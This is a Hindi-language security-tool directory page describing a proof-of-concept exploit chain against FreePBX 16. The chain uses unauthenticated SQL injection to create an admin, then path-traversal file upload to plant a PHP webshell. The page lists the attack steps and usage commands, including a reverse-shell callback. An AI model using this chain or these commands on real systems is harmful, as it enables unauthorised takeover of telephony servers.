Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FreePBX-CVE-2025-57819-RCE — FreePBX 16 के लिए अनप्रमाणित SQL इंजेक्शन और मनमाना फ़ाइल अपलोड एक्सप्लॉइट श्रृंखला, व्यवस्थापक निर्माण और वेबशेल तैनाती के माध्यम से रिमोट कोड निष्पादन प्राप्त करना। | Kitploit
उपकरण/GitHubGitHub/0xehab/freepbx-cve-2025-57819-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xehab/freepbx-cve-2025-57819-rce

FreePBX-CVE-2025-57819-RCE

FreePBX 16 के लिए अनप्रमाणित SQL इंजेक्शन और मनमाना फ़ाइल अपलोड एक्सप्लॉइट श्रृंखला, व्यवस्थापक निर्माण और वेबशेल तैनाती के माध्यम से रिमोट कोड निष्पादन प्राप्त करना।

रिपॉजिटरी देखें
1313 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

FreePBX 16 — अप्रमाणित SQLi से RCE

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉयट जो FreePBX 16 पर शून्य पहुंच से रिमोट कोड निष्पादन तक जाने के लिए दो FreePBX कमजोरियों को जोड़ता है।

CVEघटकप्रभाव
CVE-2025-57819एंडपॉइंट मॉड्यूल लोडर (brand पैरामीटर)अप्रमाणित स्टैक्ड SQL इंजेक्शन
CVE-2025-61678एंडपॉइंट मैनेजर फर्मवेयर अपलोडर (fwbrand पैरामीटर)प्रमाणित मनमाना फ़ाइल अपलोड (पथ ट्रैवर्सल)

यह कैसे काम करता है

  1. एक व्यवस्थापक बनाएं (CVE-2025-57819) — नेमस्पेस्ड एंडपॉइंट लोडर के माध्यम से प्रमाणीकरण के बिना पहुंच योग्य एक स्टैक्ड SQL इंजेक्शन का उपयोग ampusers तालिका में सीधे एक नए पूर्ण-पहुंच व्यवस्थापक को INSERT करने के लिए किया जाता है।
  2. प्रमाणित करें — PoC ताज़ा बनाए गए उपयोगकर्ता के रूप में एडमिन पैनल में लॉग इन करता है।
  3. एक वेबशेल छोड़ें (CVE-2025-61678) — एंडपॉइंट मैनेजर फर्मवेयर अपलोड हैंडलर का दुरुपयोग fwbrand में ../../../var/www/html/<dir> ट्रैवर्सल के साथ किया जाता है ताकि वेब रूट में एक PHP वेबशेल लिखा जा सके।
  4. निष्पादित करें — एक एकल कमांड चलाएं या एक इंटरैक्टिव रिवर्स शेल प्राप्त करें।

प्रभावित संस्करण

FreePBX 16 (एंडपॉइंट मॉड्यूल 16.0.92 से पहले)। 17.0.6 में भी पैच किया गया। एक निश्चित रिलीज़ में अपडेट करें।

उपयोग

root@kitploit:~
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

विकल्प

फ्लैगविवरण
--rhostलक्ष्य होस्ट (आवश्यक)
--rportलक्ष्य पोर्ट (डिफ़ॉल्ट 443)
--httpHTTPS के बजाय HTTP का उपयोग करें
--lhost / --lportरिवर्स-शेल कॉलबैक पता
--commandशेल के बजाय एक एकल कमांड चलाएं

आवश्यकताएँ

root@kitploit:~
pip install requests pwntools

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।

कीवर्ड

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · अप्रमाणित SQL इंजेक्शन · स्टैक्ड क्वेरी इंजेक्शन · एंडपॉइंट मॉड्यूल · एंडपॉइंट मैनेजर · प्रमाणित फ़ाइल अपलोड · पथ ट्रैवर्सल · रिमोट कोड निष्पादन · RCE · PoC · एक्सप्लॉयट · VoIP सुरक्षा


linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

टूल डाउनलोड करें